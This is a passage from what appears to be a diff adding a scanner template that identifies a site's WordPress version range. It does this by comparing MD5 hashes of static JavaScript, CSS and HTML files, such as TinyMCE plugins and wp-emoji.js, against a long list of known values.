"(\"a1b57674240bc9e8f76de47bf4b6f92a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"47b91f20f6c5381f52a266da9fb87508\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"0aebc1e2f8890d774f61971091e3eba3\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"0185613272e7c57f43e9e021567c8030\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4895645731e0148b7e730eff6b78a4e0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/pasteword.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"75afde509924223eab0c0b2535141192\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7db62fe5ecea992a47ad567a59fddf4a\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"140c8639b95b5985387314ff5c538e20\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a6d0b98d7aab9dc483a865ee49e308f1\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"4fe34536718be4bcfa0e6e8f6ad9e9ae\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"d5836a7e2bb8b61683d6d2a1815e446d\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"60d6e9aaf1aafe06b85da92df1a486d3\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"d958f3b1931464c30d68b499231f9d63\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7c601ec4eeee22f414ae093120b62bd0\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"62a7fcdff65cdfb1ac81160d49abd560\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"bc4d612287743f988a3f20fa66d2e611\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"002daa009655fa5e52d8374c25b7b95e\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c5e287e22909f9945c1bf65ceb7e66aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"15134339e36472281b8a1626233f747d\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"10a81b39a4bc07a7e804ae1ef9f66956\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"38b4fcfb8b026060b40c82087cd4082d\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"850959bac9b9257f66817c94fa35df27\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"89f4e23300ce29d55b985a37f61d95f0\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"994124fa3bbad1cfc9fb9900c10a6b00\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"d1ef8dc9ab08b7a58c5d96a56145ab4e\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"893f6c4038f293618722b42f4bf4c8e3\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"e1be69ab8e117a7f82952dfd9c2375e4\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"f45368a75b1c1879d5b0f5f164045e60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/fullscreen.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"d21fc65b8aade703572c6f396e475118\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"65798ace2436ed31098d3b9a58b8c3a5\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7a6c199ec99e3a7b7f20e1076e14f06f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"f7ed49c39b482daac4809bc3bd79f4a8\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"86b8cb7ae6b53d825d0c49798d842445\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"626f666036f145cefe0013847c35bf17\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"f6429e142030a88e1dec026f53c600e6\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"ca9817da53d28adaee86603ca94d69dc\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9f801bc7c58adb76341114ff20caa43a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"291a2370a72b46ff6b94722d4807b64f\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"99a680170eaa55f849619048204f74d4\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"f8d9aec34e586ebb299ed43a39b7f7b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin.js" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"cbfebda03eef4bd608a86827948c4224\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"89c9d4511cd7b90c00fdd9aa30c3bc18\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8b3524554889bac4122fe6e15b95cdc0\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"bfaaa63c2867a7c1aa80783e423a9b87\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"047a9618f11ee697eec716c88dedd8e8\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"a7b58f0ddb0e55f591c00f06e21ada67\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"490ea06c259c55ed8364450ecb02852b\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"6d22dd7115baffc34269f0eef6b618ba\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"49982a4eed623c011535b63e82aadaef\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"9d3f90a4a9531d6aeedac9a0ed9309da\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"c6753be1486843060289ac3b3940e2cf\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"d2fdd7ee581e86820a4c57389464bd21\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/template.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"31a49baf85e588fb217390f950e775e5\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6deeea3f92e1992d587c08dc51cfd091\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"987df7a126c458f5394eb711c27f5e4d\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"876e269481446c34166f18b0bf0faa9b\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"b9d081d573fd166147d32c9f180a1293\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"67594d378e290c4c935289786f89278c\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"9145ca8842ce27e7a25b4821a710c520\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"2b2ca7c291b8b1b867b44a6e5bca7991\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7d0fa8e3669dbb890fbdba95d21d432a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"d45f680745ad8747b5a5120230759c26\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"7ef20f66074ae548be36c37667e65e52\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"c01f15cd357d8dba4610c3eae6321930\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/editor_plugin.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"5ad7db86c5008f98ec135595db4a4973\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9ce4c5f8e09f3b86b7b62abb19f32b09\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"81e16046103fb1776f30838d2bb4a378\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"cc97fbc2bc892884a3fc3e3cab3b9aba\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"bcd5c851ca50eee87904b410c13c6d8c\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"8711a73c0d6d417b635bf646dc5091c8\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9beecec5d5cbdc86bee17eadc0f5a545\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"8b13bc1307b4c9d06122346c44b5e716\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"f6c1ba01ff7b8fb600c8a906a573c0ab\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"d3eca453edb0893447a1e993ce05a0f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/media.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"45d4c170a335c40f431569802a2f0e18\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"d8ada489c50c283c5732ff06aa72b4f8\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0470b34fb0c140d8d917ada27d885b87\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"0a95f87ca9fc5dd7c8e91ed7e2a2b45d\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"d17ac310b24242e2b2cc14ca08a38385\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"a8fb1a8e0aa8ac0d2b06a8a4625908c4\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"03453eabdffe90cf7e9406d618b78c10\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"2e2426d4850c4c7040424234f0b24396\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"bf4c1c5ac6d22a90dfedfbab79fe1e03\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"e2a663d0abbf3c98e9c80e2df3d575a9\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"65c3b3ce2f72ce3436d6cda2ef852668\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-fullscreen.js" + matchers: + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"669dfa41fd076fadd200112960a46fcb\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"781b0a7f92ace4c740bebd0ba2ec9cc5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b16b5388bafc33588edbf6d8a7d83932\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d3b194e346461893b6366e6e9992e5c5\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0d4afd93d02b73aed209f73e4d25469a\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"24644a8300d7318eefe876c659e57b3d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"4fa94e2fe8af8edc6ea416e1970c7cd8\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"5320e05e4751ce9c37efade68a6c0b48\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"5675f7793f171b6424bf72f9d7bf4d9a\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"7b423e0b7c9221092737ad5271d09863\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/skin.ie7.min.css" + matchers: + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"ab035d1d6fd828a1530ee6b2df22e70a\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"1ab68a0c95f250189323b986a707f70a\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"19d42e7af34d7880b12e6a40d74b0a89\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"58490013777e57ebaab84893713280c1\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"cea6608407da4b0d07f4bdad387059c2\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"f85aec87569380b36901c67b3c2fad81\" == md5(body))" + - type: dsl + name: 4.0 - 4.2.29 + dsl: + - "(\"16b6170794ca6d5f7fd29073d4a5477f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"09c1ba458c1670a68acbe8004e1c4b14\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/handlers.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"220adfeb811cbe402367392b44d5fbfd\" == md5(body))" + - type: dsl + name: 3.9 - 4.7.19 + dsl: + - "(\"14b2d04fdb85bc1f171cf3dfb2987dca\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.8.35 + dsl: + - "(\"c5d6929ea46dc1bb4ef8bffc17b3e819\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.1 + dsl: + - "(\"793ff9921f096583ba52f8606ec79f4c\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"44b4f7cfec54b7fc8410a383257af538\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"784d62b41691c6c9e1d4f49bd18a9b20\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"df9ce8622e62e80c1a80613e5cb1b25b\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"b22b8b21967e1509304c76e13c3c5047\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"d7c136a3e2143f53b37803bb894c4250\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"fd1fdc830e7c1c1e4b6d3f0b29a2da05\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"150e7f1df4bcb8695a6330aad02cc9bc\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"5d1ea480360a4139c65308bc27ccd742\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a9c61c5f04847006bfd229057721184a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"4d16bff72b33fb1e11fc960aa4a4a23e\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"c2c1ec2ac323cd308b2dc6d58370f514\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/tiny_mce_popup.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"41116cb9eb54da596cb42468d2b5d69d\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.7.19 + dsl: + - "(\"dbe62082422b75d89ecb983409ec966d\" == md5(body))" + - type: dsl + name: 4.3 - 4.5 + dsl: + - "(\"83efe579f26f25ac80fe550402db2467\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"d84233dd293717f0a07b558b2fe38f56\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.1 + dsl: + - "(\"692f8e861bafa31fbf1b3805b4b0d7d3\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"38dbcc925529368812f5c2fbcb389616\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"5a318277fedf491a0301e177a9ef10b3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"554bc76c70351187f4ce05ddc012aaed\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"9a9c125814b9715982d246a1ee78084f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"677d2f88ae991728c80ef15d112652b2\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"5906da6296b5d6dc28cfb4a9cd2dd295\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"d9e6163fd6707bf0582635247bc17a5c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"cda99de2ed0201e818ecdab304aa8a2a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"7435f4fa6463572035c9c212558491f9\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"c96b7c2981d7b5c253812487be5cd71a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"f539ddea7e23c2511166429ea78a2908\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"8a6b281d4baa3efbfa5c3690d7561a25\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"2e1d0f50dc25586e43e6609f2ef9cc0e\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"628e60ccfa9b0e77822a5359f87d1f3b\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"4237af4931ba3003048f8eb5b98364c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"1acdd0cd523695bd920ccc418b0678c9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"acf45356a0e8d21b985372c641109ae7\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"e4462639dd52885cfdf136ff15956fed\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.2 + dsl: + - "(\"5b79b0ee9feabb912f6e3a9134eef5f7\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"137858b0d72b5f4637d414461f445008\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f58df83b99c2e5bf0c6fe5f6313450f0\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"964ac7bf64ae9fddf0240fd1e3a04b67\" == md5(body))" + - type: dsl + name: 4.2.2 + dsl: + - "(\"3a083b99f4d138b72547e42f77027320\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"0f8be35f8c316861694298d218c11f5e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a98b282dc6d835e7c63db94f2bc15a38\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"e8e92de96b2688db7cbb361d0753831a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/text-widgets.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"28f9be51cafa06930392acb005b8c824\" == md5(body))" + - type: dsl + name: 4.8.1 + dsl: + - "(\"3651b41fcb718e55e0de3a29212d71ea\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"ccbae9a28443a1ad1b5bbee115dc045b\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"32b7abeff170db2b017381efe0b78fad\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2fb0dbe77a00686b5e5b3fd2f3a7858f\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"16a54defdaf982da0cabd83ec44e236e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"ddc49ad0e4b146cc8ff73d976f1298bb\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ef12ac13dfb8607a2d05135f00ceac5a\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"90dd09a79d1265f3d0601ffe37c97a01\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.2 + dsl: + - "(\"ee346cf79cc3fc6f9757e3e8e716b5f3\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"a57538e3c37236da55c1f1da474e015e\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"504d2cee82879a8d64df784d9f2e9928\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"ad4b907b479f8a0742a4ca9af3b90857\" == md5(body))" + - type: dsl + name: 4.2.2 + dsl: + - "(\"a1ee27ad90d9bd862c162080115b1890\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"974abbb6edce586b8aabe3731d19ef71\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"5a881bd372a52591d5972df05e9fab63\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bd3c01dbc3b971ea143a6a4628400dba\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"2aae979a0e8bced7b6483b8671072ebd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview.min.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"71f5d65a2add0646814684e11b1a3af9\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"c2f8e7dbb3732123437acde95db6cfb8\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"b9f62643c2bd209ffd28c665d16c7d3f\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"8eb16dc701cf206c22ab40082d814cb5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"f7b940cf84777e434b486f6837657263\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"a05e8cd6f93d192e1c7232acf2544d86\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2f60c6d976a975a85fd005c7759e7cbf\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"b8e325486884be9894b081ebac0d54ad\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6978871856b8ff6629abcca584235417\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"ca3d5ac7ffbf318c461a06c42362e671\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b06bc1c2d6c000215e645286a01295f3\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"37964f44f324f359533e4ce7693e0636\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6e3f2d3422ec9af1707e3b2d3dee2406\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f4d0c657b387dd0a32fa0f98d7cf5b04\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"1ad333686be390fb54544cb0c3214c1d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"7a6543b3b6d26ec558fac675836a565b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ed42144eb1409979845f15c50b90f0f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor-expand.min.js" + matchers: + - type: dsl + name: 4.6.1 - 5.1.8 + dsl: + - "(\"4500034a26d73b737f761adcc7ef5c79\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"2003869bb96b00cd78b008bd667dd57d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"eb145a2ecb2bb7e11fb759364301c88b\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"0deb56202e03c193c2584eba6874be49\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"78a1af5d700f31280bfc20621bce8e50\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"09470901ca55f639595600af00a70d0c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"89eab3c62d8a7e8d143ed648c593d3fd\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"4e78a0327caee92c94c119cbcdcdacf0\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"32c49e20a3451da0f1b76d1d218c684c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cec8ae46f57c71d64d459efcb897aac5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1ce055e767e96eeef80e5eb33bf2beb6\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"0d4ab764b7b09f2938b583fbd53fdce1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/plugin.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ef6e5669ee3af739f33eaf8c092edf87\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"049a123027cc7ed6f5cb6e567b631746\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"c3c8b527b2177fe3c1065d5812b86f48\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"db762695fd5a8d769b6a6002451db2bc\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3956816511219402805b87ed3d6c1965\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.23 + dsl: + - "(\"e2a1ffd8d68a5695a771d5c873539976\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"1b1e5e7e85593bbba4e4f107b6371349\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"42f0fd8dc00634c3bd92d67f983167c6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e2622abed0990e5fa1c0a46ec9857c81\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"ed367f421e178c90f4c3bbd81479d79d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"ae6c8c67d69d6b4bfddbbe0383c5c141\" == md5(body))" + - type: dsl + name: 4.1.5 - 4.1.32 + dsl: + - "(\"65ba47e11a2641fd8126987586543f6c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.4 + dsl: + - "(\"cccb0acc830cee3e5a2626dc44f6b2e3\" == md5(body))" + - type: dsl + name: 4.0.5 - 4.0.32 + dsl: + - "(\"f3aba863d0e75ae9baededd390b5c27a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.4 + dsl: + - "(\"aaaa5adacaf254b8ed29827822052b96\" == md5(body))" + - type: dsl + name: 3.9.6 - 3.9.33 + dsl: + - "(\"e9a3b52c3321a947b3675e9452523bed\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.5 + dsl: + - "(\"fe275a56b9c9d2d4332f0df93a6d5260\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"4a542ce8fe045da7e3048411e421ba28\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"1bbdc179b04731a40281f164ae2da2b0\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.16 + dsl: + - "(\"49be97e35bba4ff1c426a6df80155e87\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"57aaf03ff9d4a85d6694c3c2d272195a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"fb23e8dfbfb277faf246b3ae071de2c6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b8eab0015d30532664714ef9c9cc4801\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"abfe8ead341e68cfee6625b6d5627a0d\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f8ed466f8435d6b8464eda4d3282e1ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-widgets.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"92f604e25ad411a8ed016e06d21c44cc\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"030addbc8364e837fde9d573fa433329\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - 